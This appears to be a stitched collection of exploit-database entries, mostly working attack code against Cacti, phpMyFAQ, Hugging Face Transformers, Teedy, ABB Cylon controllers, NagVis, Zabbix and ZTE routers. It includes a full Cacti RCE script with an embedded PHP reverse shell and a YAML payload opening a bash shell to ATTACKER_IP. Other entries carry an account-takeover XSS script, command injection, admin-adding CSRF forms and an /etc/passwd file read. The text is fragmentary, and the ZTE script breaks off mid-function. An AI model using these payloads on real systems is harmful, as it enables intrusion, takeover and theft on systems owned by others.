░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
Cookie: PHPSESSID=xxx; context1=xxx; globals={"currentUser":{"username":"aamuser","authdata":"YWFtdXNlcjpkZWZhdWx0","mangledAuth":"bXVidmZnO2Vmc3Z0Ym45YjczMzY2ODo6MjQyODQ7Mg==","loginExpirySeconds":0},"loggedIn":true,"lang":"en"}; cod=5.27; connect.sid=xxx; csd=44
# Exploit Title: Cacti 1.2.26 - Remote Code Execution (RCE) (Authenticated)
# Date: 06/01/2025
# Exploit Author: D3Ext
# Vendor Homepage: https://cacti.net/
# Software Link: https://github.com/Cacti/cacti/archive/refs/tags/release/1.2.26.zip
# Version: 1.2.26
# Tested on: Kali Linux 2024
# CVE: CVE-2024-25641
#!/usr/bin/python3
import os
import requests
import base64
import gzip
import time
import argparse
import string
import random
from bs4 import BeautifulSoup
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding, rsa
from cryptography.hazmat.primitives import serialization
def get_random_string(length):
letters = string.ascii_lowercase
result_str = ''.join(random.choice(letters) for i in range(length))
return result_str
def check_version(url_to_check):
r = requests.get(url_to_check)
response = r.text
if "Cacti CHANGELOG" in response and "1.2.26" in response and "1.2.27" not in response:
print("[+] Version seems to be 1.2.26")
else:
print("[-] Version doesn't seem to be 1.2.26, proceeding anyway")
# Main function
if __name__ == '__main__':
p = argparse.ArgumentParser(description="CVE-2024-25641 - Cacti 1.2.26 Authenticated RCE")
p.add_argument('--url', help="URL of the Cacti web root", required=True)
p.add_argument('--user', help="username to log in", required=True)
p.add_argument('--password', help="password of the username", required=True)
p.add_argument('--lhost', help="local host to receive the reverse shell", required=True)
p.add_argument('--lport', help="local port to receive the reverse shell", required=True)
p.add_argument('--verbose', help="enable verbose", action='store_true', default=False, required=False)
# Parse CLI arguments
parser = p.parse_args()
url = parser.url
username = parser.user
password = parser.password
lhost = parser.lhost
lport = parser.lport
verbose = parser.verbose
url = url.rstrip("/")
print("CVE-2024-25641 - Cacti 1.2.26 Authenticated RCE\n")
# check if versions match
print("[*] Checking Cacti version...")
time.sleep(0.5)
check = check_version(url + "/CHANGELOG")
if check == False:
sys.exit(0)
req = requests.Session()
if verbose:
print("[*] Capturing CSRF token...")
r = req.get(url)
# extract CSRF token
soup = BeautifulSoup(r.text, 'html.parser')
html_parser = soup.find('input', {'name': '__csrf_magic'})
csrf_token = html_parser.get('value')
if verbose:
print("[+] CSRF token: " + csrf_token)
print("[*] Logging in on " + url + "/index.php")
# define login post data
login_data = {
'__csrf_magic': csrf_token,
'action': 'login',
'login_username': username,
'login_password': password,
'remember_me': 'on'
}
# send login request
r = req.post(url + "/index.php", data=login_data)
# check success
if 'Logged in' in r.text:
print("[+] Successfully logged in as " + username)
else:
print("[-] An error has ocurred while logging in as " + username)
sys.exit(0)
# generate random filename
random_name = get_random_string(10)
random_filename = random_name + ".php"
payload = """<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '""" + lhost + """';
$port = """ + lport + """;
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>"""
# generate payload
print("[*] Generating malicious payload...")
keypair = rsa.generate_private_key(public_exponent=65537, key_size=2048)
public_key = keypair.public_key().public_bytes(encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.SubjectPublicKeyInfo)
file_signature = keypair.sign(payload.encode('utf-8'), padding.PKCS1v15(), hashes.SHA256())
b64_payload = base64.b64encode(payload.encode('utf-8')).decode('utf-8')
b64_file_signature = base64.b64encode(file_signature).decode('utf-8')
b64_public_key = base64.b64encode(public_key).decode('utf-8')
data = """<xml>
<files>
<file>
<name>resource/""" + random_filename + """</name>
<data>""" + b64_payload + """</data>
<filesignature>""" + b64_file_signature + """</filesignature>
</file>
</files>
<publickey>""" + b64_public_key + """</publickey>
<signature></signature>
</xml>"""
signature = keypair.sign(data.encode('utf-8'), padding.PKCS1v15(), hashes.SHA256())
final_data = data.replace("<signature></signature>", "<signature>" + base64.b64encode(signature).decode('utf-8') + "</signature>").encode('utf-8')
# write gzip data
f = open(random_filename + ".gz", "wb")
f.write(gzip.compress(final_data))
f.close()
print("[+] Malicious GZIP: " + random_filename + ".gz")
# define post data
post_data = {
'__csrf_magic': csrf_token,
'trust_signer': 'on',
'save_component_import': 1,
'action': 'save'
}
# upload file
print("[*] Uploading GZIP file...")
# send post request
r = req.post(url + "/package_import.php?package_location=0&preview_only=on&remove_orphans=on&replace_svalues=on", data=post_data, files={'import_file': open(random_filename + ".gz", 'rb')})
print("[+] Successfully uploaded GZIP file")
time.sleep(0.5)
print("[*] Validating success...")
soup = BeautifulSoup(r.text, 'html.parser')
html_parser = soup.find('input', {'title': "/var/www/html/cacti/resource/" + random_filename})
file_id = html_parser.get('id')
post_data = {
'__csrf_magic': csrf_token,
'trust_signer': 'on',
'data_source_profile': 1,
'remove_orphans': 'on',
'replace_svalues': 'on',
file_id: 'on',
'save_component_import': 1,
'preview_only': '',
'action': 'save',
}
r = req.post(url + "/package_import.php?header=false", data=post_data)
print("[+] Success!")
time.sleep(0.5)
print("[*] Triggering reverse shell by sending GET request to " + url + "/resource/" + random_filename)
time.sleep(0.2)
print("[+] Check your netcat listener")
# remove payload file
os.remove(random_filename + ".gz")
r = req.get(url + "/resource/" + random_filename)
# Exploit Title: phpMyFAQ 3.1.7 - Reflected Cross-Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 3.1.7
# Tested on: Ubuntu Windows
# CVE : CVE-2022-4407
PoC:
Get: http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>
Details:
{
"Sink": "phpmyfaq/admin/header.php - HTML attribute in the form action parameter",
"Vulnerable Variable": "action",
"Source": "phpmyfaq/admin/index.php - Filter::filterInput(INPUT_GET, 'action', FILTER_UNSAFE_RAW)",
"Sanitization Mechanisms Before Patch": "None - Input directly used without escaping or encoding in the HTML attribute",
"Sink Context Constraints": "HTML attribute context - needs proper escaping to break out of attribute",
"Attack Payload": "\"><script>alert('XSS')</script>",
"Execution Path Constraints": "The 'action' parameter must be passed via GET or POST without prior sanitization or if it is null, it must be taken from 'redirect-action' parameter unless it equals 'logout'",
"Request Parameters": "action",
"Request URL": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>",
"Request Method": "GET",
"Final PoC": "http://127.0.0.1/phpmyfaq/admin/index.php?action=\"><script>alert('XSS')</script>"
}
[Replace Your Domain Name]
# Exploit Title: Hugging Face Transformers MobileViTV2 RCE
# Date: 29-11-2024
# Exploit Author: The Kernel Panic
# Vendor Homepage: https://huggingface.co/
# Software Link: https://github.com/huggingface/transformers/releases
# Version: 4.41.1
# Tested on: Linux, Windows, Mac
# CVE : CVE-2024-11392
# Code flow from input to the vulnerable condition:
# 1. The user downloads a third-party ml-cvnet model alongside its configuration file.
# 2. The user runs the convert_mlcvnets_to_pytorch.py script and passes the configuration file to it.
# 3. The convert_mlcvnets_to_pytorch.py script de-serializes the configuration file and executes the malicious code.
# POC
# Create a malicious yaml configuration file called "transformers_exploit.yaml" like shown below.
# Note: Remember to change the 'ATTACKER_IP' and 'ATTACKER_PORT'.
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('socket').socket(socket.AF_INET, socket.SOCK_STREAM).connect(('ATTACKER_IP', ATTACKER_PORT));import os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ATTACKER_IP',ATTACKER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn('/bin/bash')"
# Run the convert_mlcvnets_to_pytorch.py script and pass the transformers_exploit.yaml file to --orig_config_path
> python convert_mlcvnets_to_pytorch.py --orig_checkpoint_path dummy_checkpoint.pt --or
# Note: The dummy_checkpoint.pt can be left as an empty file, dummy_output as an empty directory , and "task" as any of the options metioned in the script.
# Exploit Title: Teedy 1.11 - Account Takeover via Stored Cross-Site Scripting (XSS)
# Exploit Author: Ayato Shitomi @ Fore-Z co.ltd
# Demo Video: https://www.youtube.com/watch?v=udQgVogsmhA
# Vendor Homepage: https://teedy.io/
# Software Link: https://github.com/Tomblib0/Teedy
# Version: 1.11
# Tested on: Linux
# CVE : CVE-2024-46278
There is a vulnerability that causes XSS when downloading files.
XSS vulnerability could allow a Teedy administrator to rob an account with a few clicks.
Login as an attacker’s account.
Upload this file as html type. You have to change “Origin” and “Referer” and argument for fetch in need.
```
<script>
const currentCookie = document.cookie;
const requestOptions = {
method: 'POST',
headers: {
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
'Accept': 'application/json, text/plain, */*',
'Cookie': currentCookie,
'sec-ch-ua': '"Not_A Brand";v="8", "Chromium";v="120"',
'sec-ch-ua-mobile': '?0',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36',
'sec-ch-ua-platform': '"Linux"',
'Origin': 'http://localhost:8080',
'Sec-Fetch-Site': 'same-origin',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Dest': 'empty',
'Referer': 'http://localhost:8080/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9'
},
body: 'password=superSecure2&passwordconfirm=superSecure2'
};
fetch('http://localhost:8080/api/user', requestOptions)
.then(response => {
if (!response.ok) {
throw new Error('Network response was not ok');
}
document.write('<h1>Your account was taken over by the attacker LOL</h1>');
return response.json();
})
.then(data => console.log(data))
.catch(error => console.error('There was a problem with your fetch operation:', error));
</script>
```
Login with another account. eg. admin
Click on the file uploaded by the attacker and select Download this file.
# Exploit title : ABB Cylon Aspect 4.00.00 (factorySetSerialNum.php) Remote Code Execution
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=4.00.00
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
blind command injection vulnerability. Input passed to the serial and ManufactureDate
POST parameters is not properly sanitized, allowing attackers to execute arbitrary
shell commands on the system. While factory test scripts included in the upgrade
bundle are typically deleted, a short window for exploitation exists when the device
is in the manufacturing phase.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5894
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5894.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ curl http://192.168.73.31/factorySetSerialNum.php \
> -d "serial=;sleep 2&ManufactureDate=;sleep 3"
# Exploit Title: NagVis 1.9.33 - Arbitrary File Read
# Date: 03/12/2024
# Exploit Author: David Rodríguez a.k.a. xerosec
# Vendor Homepage: https://www.nagvis.org/
# Software Link: https://www.nagvis.org/downloads/archive
# Version: 1.9.33
# Tested on: Linux
# CVE: CVE-2022-46945
import requests
import argparse
import json
from urllib.parse import urljoin
def authenticate(target_url, username, password):
url = urljoin(target_url, '/nagvis/frontend/nagvis-js/index.php')
headers = {"User-Agent": "Mozilla/5.0", "Content-Type": "application/x-www-form-urlencoded"}
data = {"_username": username, "_password": password, "submit": "Login"}
try:
response = requests.post(url, headers=headers, data=data)
if response.status_code == 200 and "Set-Cookie" in response.headers:
print("[✔] Authentication successful.")
return response.headers["Set-Cookie"]
print(f"[✘] Authentication failed. Status code: {response.status_code}")
except Exception as e:
print(f"[✘] Request error: {e}")
return None
def exploit(target_url, session_cookie, file_path):
url = urljoin(target_url, '/nagvis/server/core/ajax_handler.php')
headers = {"User-Agent": "Mozilla/5.0", "Cookie": session_cookie}
params = {"mod": "General", "act": "getHoverUrl", "url[]": f"file://{file_path}"}
try:
response = requests.get(url, headers=headers, params=params)
if response.status_code == 200:
print("[✔] Exploitation successful. File content:\n")
display_file_content(response.text)
else:
print(f"[✘] Exploitation failed. Status code: {response.status_code}")
except Exception as e:
print(f"[✘] Request error: {e}")
def display_file_content(raw_response):
try:
data = json.loads(raw_response)
if isinstance(data, list) and len(data) > 0 and isinstance(data[0], dict) and "code" in data[0]:
content = data[0]["code"]
# Decodificar escapes de manera segura
content = content.encode('utf-8').decode('unicode_escape')
print(content.strip())
else:
print("[✘] Unexpected JSON structure.")
except json.JSONDecodeError as jde:
print(f"[✘] JSON decoding error: {jde}")
except Exception as e:
print(f"[✘] Unexpected error during output processing: {e}")
def main():
parser = argparse.ArgumentParser(description="Exploit for CVE-2022-46945 (File Read Vulnerability)")
parser.add_argument("-t", "--target", required=True, help="Target base URL (e.g., http://10.0.2.132)")
parser.add_argument("-u", "--username", required=True, help="Username for authentication")
parser.add_argument("-p", "--password", required=True, help="Password for authentication")
parser.add_argument("-f", "--file", required=True, help="File path to read (e.g., /etc/passwd)")
args = parser.parse_args()
session_cookie = authenticate(args.target, args.username, args.password)
if session_cookie:
exploit(args.target, session_cookie, args.file)
if __name__ == "__main__":
main()
# Exploit title: ABB Cylon Aspect 4.00.00 (factorySaved.php) Unauthenticated XSS
# Vendor: ABB Ltd.
# Product web page: https://www.global.abb
# Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=4.00.00
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an unauthenticated
reflected cross-site scripting vulnerability in the 'title' GET parameter.
Input is not properly sanitized before being returned to the user, allowing
the execution of arbitrary HTML/JS code in a user's browser session in the
context of the affected site. While the factory test scripts included in the
upgrade bundle are typically deleted, a short window for exploitation exists
when the device is in the manufacturing phase.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
ErgoTech MIX Deployment Server 2.0.0
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2025-5893
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5893.php
21.04.2024
--
$ cat project
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
$ http://192.168.73.31/factorySaved.php?title=<script>console.log('ZSL')</script>
<html>
<!--
ABB Cylon Aspect 3.08.02 (userManagement.php) Cross-Site Request Forgery
Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
Firmware: <=3.08.02
Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.
Desc: The ABB BMS/BAS controller allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: GNU/Linux 3.15.10 (armv7l)
GNU/Linux 3.10.0 (x86_64)
GNU/Linux 2.6.32 (x86_64)
Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
PHP/7.3.11
PHP/5.6.30
PHP/5.4.16
PHP/4.4.8
PHP/5.3.3
AspectFT Automation Application Server
lighttpd/1.4.32
lighttpd/1.4.18
Apache/2.2.15 (CentOS)
OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2024-5870
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5870.php
CVE ID: CVE-2024-48846
CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48846
21.04.2024
-->
P R O J E C T
.|
| |
|'| ._____
___ | | |. |' .---"|
_ .-' '-. | | .--'| || | _| |
.-'| _.| | || '-__ | | | || |
|' | |. | || | | | | || |
____| '-' ' "" '-' '-.' '` |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
// Add User/Admin
<body>
<form action="http://192.168.73.31/userManagement.php" method="POST">
<input type="hidden" name="USER" value="zeroscience" />
<input type="hidden" name="PASSWORD" value="ZSL251" />
<input type="hidden" name="ACTION" value="Add" />
<input type="submit" value="Make me a prince! (php)" />
</form>
</body>
// Add User/Admin
<body>
<form action="http://192.168.73.31:7226/servlet/UserManager" method="POST">
<input type="hidden" name="newuser" value="test" />
<input type="hidden" name="password" value="test123" />
<input type="hidden" name="passwordConfirm" value="test123" />
<input type="hidden" name="Insert" value="Add" />
<input type="submit" value="Make me a prince! (java)" />
</form>
</body>
// Delete User/Admin
<body>
<form action="http://192.168.73.31:7226/servlet/UserManager" method="POST">
<input type="hidden" name="user9" value="test" />
<input type="hidden" name="remove9" value="1" />
<input type="hidden" name="totalRows" value="9" />
<input type="hidden" name="Delete" value="Delete" />
<input type="submit" value="Destr0y" />
</form>
</body>
</html>
# Exploit Title: Zabbix 7.0.0 - SQL Injection
# Date: 06/12/2024
# Exploit Author: Leandro Dias Barata @m4nb4
# Vendor Homepage: https://www.zabbix.com/
# Software Link: https://support.zabbix.com/browse/ZBX-25623
# Version: 6.0.0 - 6.0.31 / 6.0.32rc1 6.4.0 - 6.4.16 / 6.4.17rc1 7.0.0
# Tested on: Kali Linux kali-linux-2024.3
# CVE: CVE-2024-42327
import requests
import argparse
HEADERS = {"Content-Type": "application/json"}
def main():
parser = argparse.ArgumentParser(description="CHECK for CVE-2024-42327")
parser.add_argument("-t", "--target", required=True, help="API URL")
parser.add_argument("-u", "--username", required=True, help="Username")
parser.add_argument("-p", "--password", required=True, help="Password")
args = parser.parse_args()
url = f"{args.target.rstrip('/')}/api_jsonrpc.php"
# Login to get the token
login_data = {
"jsonrpc": "2.0",
"method": "user.login",
"params": {"username": args.username, "password": args.password},
"id": 1,
"auth": None
}
try:
login_response = requests.post(url, json=login_data, headers=HEADERS)
login_response.raise_for_status()
auth_token = login_response.json().get("result")
# Simple SQLi test
data = {
"jsonrpc": "2.0",
"method": "user.get",
"params": {
"selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
"userids": ["1", "2"]
},
"id": 1,
"auth": auth_token
}
test_response = requests.post(url, json=data, headers=HEADERS)
test_response.raise_for_status()
if "error" in test_response.text:
print("[-] NOT VULNERABLE.")
else:
print("[!] VULNERABLE.")
except requests.RequestException as e:
print(f"[!] Request error: {e}")
if __name__ == "__main__":
main()
# Exploit Title: ZTE ZXHN H168N 3.1 - RCE via authentication bypass
# Author: l34n / tasos meletlidis
# Exploit Blog: https://i0.rs/blog/finding-0click-rce-on-two-zte-routers/
import http.client, requests, os, argparse, struct, zlib
from io import BytesIO
from os import stat
from Crypto.Cipher import AES
def login(host, port, username, password):
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
data = {
"Username": username,
"Password": password,
"Frm_Logintoken": "",
"action": "login"
}
requests.post(f"http://{host}:{port}/", headers=headers, data=data)
def logout(host, port):
